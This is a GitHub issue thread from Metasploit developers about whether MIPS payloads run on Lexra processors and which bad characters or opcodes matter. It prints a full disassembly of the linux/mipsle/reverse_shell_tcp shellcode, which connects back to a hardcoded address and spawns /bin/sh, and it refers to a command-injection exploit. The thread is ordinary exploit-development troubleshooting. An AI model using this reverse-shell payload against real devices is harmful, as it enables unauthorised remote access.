### ISSUE TITLE
Add support for MIPS Lexra Processors

### ISSUE THREAD

**Issue by nstarke** [rapid7/metasploit-framework#12755]
Right now the `ARCH_MIPSBE` and `ARCH_MIPSLE` payloads will not work on Lexra based devices.  This is because Lexra is a subset of MIPS that does not include the unaligned load and store (lwl, lwr, swl, swr) instructions [1].  

Would it be possible to add support for lexra devices by building a payload `ARCH_MIPS_LEXRA`? 

My other thought was to blacklist those opcodes as `BADCHARS`, but I'm not sure how well that would work.

[[1]](https://en.wikipedia.org/wiki/Lexra) - (https://en.wikipedia.org/wiki/Lexra)

**Comment by nstarke** [comment]
I was able to accomplish what I was trying to do here using BadChars, I'll close this now.

**Comment by h00die** [comment]
for records keeping, what were the bad chars? (you can just copy paste the `set badchars` line)

**Comment by nstarke** [comment]
`'BadChars' => "\x00"`

Additionally, I disassembled `linux/mipsle/reverse_shell_tcp` and did not see any of the aforementioned instructions that cannot be used in lexra processors:

```
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined entry()
             undefined         v0_lo:1        <RETURN>
             undefined4        Stack[-0x4]:4  local_4                                 XREF[1,3]:   004000fc(W), 
                                                                                                   00400070(W), 
                                                                                                   00400074(R), 
                                                                                                   004000b8(R)  
             undefined4        Stack[-0x8]:4  local_8                                 XREF[1]:     004000f8(W)  
             undefined4        Stack[-0xc]:4  local_c                                 XREF[1]:     004000f0(W)  
             undefined4        Stack[-0x10]:4 local_10                                XREF[1]:     004000ec(W)  
             undefined4        Stack[-0x14]:4 local_14                                XREF[1]:     004000e0(W)  
             undefined4        Stack[-0x1a]:4 local_1a                                XREF[1]:     00400098(W)  
             undefined4        Stack[-0x1e]:4 local_1e                                XREF[1,1]:   00400080(W), 
                                                                                                   0040008c(W)  
                             entry                                           XREF[3]:     Entry Point(*), 00400018(*), 
                                                                                          0040005c(j)  
        00400054 fa ff 0f 24     li         t7,-0x6
                             LAB_00400058                                    XREF[1]:     00400060(j)  
        00400058 27 78 e0 01     nor        t7,t7,zero
        0040005c fd ff e4 21     bovc       t7,a0,entry
        00400060 fd ff e5 21     bovc       t7,a1,LAB_00400058
        00400064 ff ff 06 28     slti       a2,zero,-0x1
        00400068 57 10 02 24     li         v0,0x1057
        0040006c 0c 01 01 01     syscall
        00400070 ff ff a2 af     sw         v0,local_4+0x3(sp)
        00400074 ff ff a4 8f     lw         a0,local_4+0x3(sp)
        00400078 fd ff 0f 34     ori        t7,zero,0xfffd
        0040007c 27 78 e0 01     nor        t7,t7,zero
        00400080 e2 ff af af     sw         t7,local_1e(sp)
        00400084 11 5c 0e 3c     aui        t6,zero,0x5c110000
        00400088 11 5c ce 35     ori        t6,t6,0x5c11
        0040008c e4 ff ae af     sw         t6,local_1e+0x2(sp)
        00400090 63 6e 0e 3c     aui        t6,zero,0x6e630000
        00400094 c0 a8 ce 35     ori        t6,t6,0xa8c0
        00400098 e6 ff ae af     sw         t6,local_1a(sp)
        0040009c e2 ff a5 27     addiu      a1,sp,-0x1e
        004000a0 ef ff 0c 24     li         t4,-0x11
        004000a4 27 30 80 01     nor        a2,t4,zero
        004000a8 4a 10 02 24     li         v0,0x104a
        004000ac 0c 01 01 01     syscall
        004000b0 fd ff 11 24     li         s1,-0x3
        004000b4 27 88 20 02     nor        s1,s1,zero
        004000b8 ff ff a4 8f     lw         a0,local_4+0x3(sp)
                             LAB_004000bc                                    XREF[1]:     004000d0(j)  
        004000bc 21 28 20 02     move       a1,s1
        004000c0 df 0f 02 24     li         v0,0xfdf
        004000c4 0c 01 01 01     syscall
        004000c8 ff ff 10 24     li         s0,-0x1
                             LAB_004000cc                                    XREF[1]:     004000cc(j)  
        004000cc ff ff 31 22     bovc       s1,s1,LAB_004000cc
        004000d0 fa ff 30 16     bne        s1,s0,LAB_004000bc
        004000d4 ff ff 06 28     _slti      a2,zero,-0x1
        004000d8 62 69 0f 3c     aui        t7,zero,0x69620000
        004000dc 2f 2f ef 35     ori        t7,t7,0x2f2f
        004000e0 ec ff af af     sw         t7,local_14(sp)
        004000e4 73 68 0e 3c     aui        t6,zero,0x68730000
        004000e8 6e 2f ce 35     ori        t6,t6,0x2f6e
        004000ec f0 ff ae af     sw         t6,local_10(sp)
        004000f0 f4 ff a0 af     sw         zero,local_c(sp)
        004000f4 ec ff a4 27     addiu      a0,sp,-0x14
        004000f8 f8 ff a4 af     sw         a0,local_8(sp)
        004000fc fc ff a0 af     sw         zero,local_4(sp)
        00400100 f8 ff a5 27     addiu      a1,sp,-0x8
        00400104 ab 0f 02 24     li         v0,0xfab
        00400108 0c 01 01 01     syscall
        0040010c 00 00 00 00     nop
        00400110 00 00 00 00     nop
        00400114 00 00 00 00     nop
        00400118 00 00 00 00     nop
        0040011c 00 00 00 00     nop
        00400120 00 00 00 00     nop
        00400124 00 00 00 00     nop
        00400128 00 00 00 00     nop
        0040012c 00 00 00 00     nop
        00400130 00 00 00 00     nop
        00400134 00 00 00 00     nop
        00400138 00 00 00 00     nop
        0040013c 00 00 00 00     nop
        00400140 00 00 00 00     nop
        00400144 00 00 00 00     nop
        00400148 00 00 00 00     nop
        0040014c 00 00 00 00     nop
```

So it turns out that `ARCH_MIPSLE` and `ARCH_MIPSBE` will work with Lexra processors if `"\x00"` is used as the BadChars value.

**Comment by wvu-r7** [comment]
Is null a badchar for the vuln or the architecture?

**Comment by nstarke** [comment]
@wvu-r7 not sure, sorry.  I suspect its the ISA, but it could just be the vuln.

**Comment by wvu-r7** [comment]
I'm skeptical it's the ISA, but I'd love to be shown wrong. What kind of vuln are we talking about?

**Comment by nstarke** [comment]
https://github.com/rapid7/metasploit-framework/pull/12756 is the specific exploit I was working on.

**Comment by wvu-r7** [comment]
Interesting. Since you're staging a binary payload via a command injection, I don't see how null bytes would normally be a problem for the vuln. Maybe you are right. I don't know Lexra.

**Comment by nstarke** [comment]
@wvu-r7 that was exactly what I was thinking.  I once did a presentation where I built TCPDUMP for lexra devices and IIRC the tool chains I used didn't allow NULL-byte nops.  But this was years ago, and I could be totally wrong as well.

**Comment by wvu-r7** [comment]
You are probably right with that additional insight. I wonder why.

**Comment by wvu-r7** [comment]
What encoder is being selected when you set `BadChars`? I imagine it's using an encoder on any of the payloads and not selecting `linux/mipsle/reverse_shell_tcp` without encoding.

**Comment by wvu-r7** [comment]
However, if there are null bytes in the decoded shellcode, and the ISA forbids it, the payload would fail. So what's going on?

**Comment by nstarke** [comment]
@wvu-r7 I'll do some digging in the next few days and see if I can't figure out what is going on.

**Comment by wvu-r7** [comment]
Cool, really curious!

**Comment by nstarke** [comment]
I assembled the following totally busted-ass MIPS assembly to get an idea of the forbidden opcodes we are dealing with:

```
.text
.globl _main
_main:
  lwr $4, 2($0) 
  lwl $4, 2($0)
  swr $4, 5($0) 
  swl $4, 5($0)   

```

The output:

```
                             //
                             // .text 
                             // SHT_PROGBITS  [0x0 - 0x1f]
                             // ram: 00010000-0001001f
                             //
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined _main()
             undefined         v0:1           <RETURN>
                             _main                                           XREF[3]:     Entry Point(*), 00010038(*), 
                                                                                          _elfSectionHeaders::00000034(*)  
        00010000 02 00 04 98     lwr        a0,0x2(zero)
        00010004 02 00 04 88     lwl        a0,0x2(zero)
        00010008 00 00 00 00     nop
        0001000c 05 00 04 b8     swr        a0,0x5(zero)
        00010010 05 00 04 a8     swl        a0,0x5(zero)
[...]
```

This suggests the forbidden opcodes are:
```
04 98
04 88
04 b8
04 a8
```

Which really has nothing to do with null bytes, so I'm guessing this is just something specific to the vuln and NOT the ISA.  @wvu-r7 what do you think?

**Comment by wvu-r7** [comment]
Likely the vuln. Can you get a debugger on the target?

**Comment by nstarke** [comment]
I got GDBServer running against the target, but now I can't reproduce the crash I was seeing the other day.  I tried removing the BadChars section from the module config and the payload still works; some other change I made must have set me in a better payload state.  I have no idea what change that might have been though.  Not sure what else to say about this other than the original ticket must have been misguided in nature.  Sorry for the confusion folks.
